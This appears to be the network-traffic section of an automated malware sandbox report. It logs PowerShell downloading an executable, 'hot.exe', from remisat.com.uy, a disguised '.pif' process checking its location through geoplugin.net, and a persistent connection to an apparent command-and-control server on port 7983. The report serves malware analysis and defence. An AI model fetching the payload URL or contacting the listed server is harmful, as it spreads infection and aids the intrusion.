Jul 26, 2024 13:03:08.590054035 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.590574026 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.590626955 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.590894938 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.590944052 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.596240997 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.596477985 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.596582890 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.600938082 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.625159979 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.625267029 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.625332117 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.625396013 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.625907898 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.638405085 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.654370070 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.654463053 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.655019999 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.655091047 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.655137062 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.655196905 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.655306101 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.655368090 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.663575888 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.674967051 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.675051928 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.675328970 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.675404072 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.675776005 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.675847054 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.675978899 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.676040888 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.676269054 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.676279068 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.676345110 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.676743031 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.676810980 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.676837921 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.676892996 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.677311897 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.677367926 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.677527905 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.677685022 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.685153008 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.685228109 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.713129997 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.713238955 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.713469028 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.713524103 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.714144945 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.743052006 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.743113041 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.743125916 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.743141890 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.743153095 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.743232965 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.743381023 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.743446112 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.743613005 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.743665934 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.763176918 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.764033079 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.764107943 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.764120102 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.764146090 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.764174938 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.764184952 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.764374971 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.764431000 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.764831066 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.764895916 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.765275002 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.765327930 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.765352011 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.765403032 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.766088009 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.766151905 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.766328096 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.766380072 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.766383886 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.766396046 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.766434908 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.773724079 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.773798943 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.802103043 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.802210093 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.802357912 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.802417040 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.829184055 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.832683086 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.832765102 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.832890987 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.832947969 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.833214045 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.833275080 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.833595037 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.833650112 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.847465992 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.852452993 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.852545023 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.852978945 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.853048086 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.853220940 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.853275061 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.853462934 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.853522062 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.853945017 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.854007006 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.854176044 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.854243994 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.854758978 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.854830027 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.855309010 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.855379105 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.855428934 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.855483055 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.855746031 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.855801105 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.862747908 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.862811089 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.890638113 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.890734911 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.890875101 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.890932083 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.895935059 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.919209957 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.921196938 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.921253920 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.921330929 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.921374083 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.921643972 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.921696901 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.921966076 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.922022104 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.941482067 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.941569090 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.941768885 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.941833019 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.942061901 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.942121029 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.942653894 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.942712069 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.942768097 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.942831039 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.943324089 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.943389893 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.943648100 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.943715096 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.944096088 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.944149971 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.944185972 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.944237947 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.951667070 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.951756954 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.979602098 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.979746103 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.979804993 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.979842901 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.979860067 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.979901075 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.010123968 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.010262966 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.010682106 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.010756969 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.010782003 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.010864973 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.012166023 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.012243986 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.030734062 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.030843019 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.031167984 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.031266928 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.031274080 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.031292915 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.031322002 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.031333923 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.031852007 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.031944036 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.031966925 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.032021999 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.032617092 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.032670975 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.033052921 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.033113003 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.033149004 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.033201933 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.035681963 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.035777092 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.045871973 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.045970917 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:09.045985937 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.046010971 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.223234892 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.235992908 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:09.662103891 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:12.797816992 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:12.804234982 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:12.804312944 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:12.809672117 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:12.815809011 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:13.492214918 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:13.537765980 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:13.626607895 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:13.645754099 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:13.650839090 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:13.653752089 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:13.658554077 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:13.658602953 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:13.663467884 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:14.074599981 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:14.078344107 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:14.083478928 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:14.177932024 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:14.224320889 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:14.314702988 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:03:14.319772005 CEST	80	49735	178.237.33.50	192.168.2.4
Jul 26, 2024 13:03:14.320018053 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:03:14.320018053 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:03:14.325892925 CEST	80	49735	178.237.33.50	192.168.2.4
Jul 26, 2024 13:03:14.927229881 CEST	80	49735	178.237.33.50	192.168.2.4
Jul 26, 2024 13:03:14.929873943 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:03:14.940709114 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:14.947446108 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:15.928812981 CEST	80	49735	178.237.33.50	192.168.2.4
Jul 26, 2024 13:03:15.928881884 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:03:49.847261906 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:49.847353935 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:49.847404957 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:49.848413944 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:50.068125963 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:50.086276054 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:50.086334944 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:03:50.090476990 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:03:50.090508938 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:04:25.511735916 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:04:25.513062954 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:04:25.517993927 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:04:59.817162037 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:04:59.820559025 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:04:59.825973034 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:05:04.287102938 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:04.599450111 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:05.212497950 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:06.412079096 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:08.818198919 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:13.630682945 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:23.240175962 CEST	49735	80	192.168.2.4	178.237.33.50
Jul 26, 2024 13:05:34.516304016 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:05:34.517539024 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:05:34.526843071 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:06:09.336391926 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:06:09.343077898 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:06:09.350636959 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:06:44.748239994 CEST	7983	49734	204.10.160.230	192.168.2.4
Jul 26, 2024 13:06:44.749543905 CEST	49734	7983	192.168.2.4	204.10.160.230
Jul 26, 2024 13:06:44.754473925 CEST	7983	49734	204.10.160.230	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 13:03:06.919730902 CEST	54374	53	192.168.2.4	1.1.1.1
Jul 26, 2024 13:03:07.289202929 CEST	53	54374	1.1.1.1	192.168.2.4
Jul 26, 2024 13:03:14.299443007 CEST	59993	53	192.168.2.4	1.1.1.1
Jul 26, 2024 13:03:14.309178114 CEST	53	59993	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 13:03:06.919730902 CEST	192.168.2.4	1.1.1.1	0x5d70	Standard query (0)	remisat.com.uy	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:14.299443007 CEST	192.168.2.4	1.1.1.1	0x1b1b	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 13:03:07.289202929 CEST	1.1.1.1	192.168.2.4	0x5d70	No error (0)	remisat.com.uy		192.254.232.209	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:14.309178114 CEST	1.1.1.1	192.168.2.4	0x1b1b	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

remisat.com.uy

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	178.237.33.50	80	7424	C:\Users\user\AppData\Roaming\PuttyTest777.pif

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:03:14.320018053 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jul 26, 2024 13:03:14.927229881 CEST	1170	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 11:03:14 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	192.254.232.209	443	7020	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:03:08 UTC	170	OUT	GET /zti/hot.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: remisat.com.uy Connection: Keep-Alive
2024-07-26 11:03:08 UTC	249	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:03:08 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 26 Jul 2024 04:58:03 GMT Accept-Ranges: bytes Content-Length: 961544 Content-Type: application/x-msdownload
2024-07-26 11:03:08 UTC	7943	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ff 17 a3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 6c 0e 00 00 08 00 00 00 00 00 00 be 8a 0e 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfl @ @
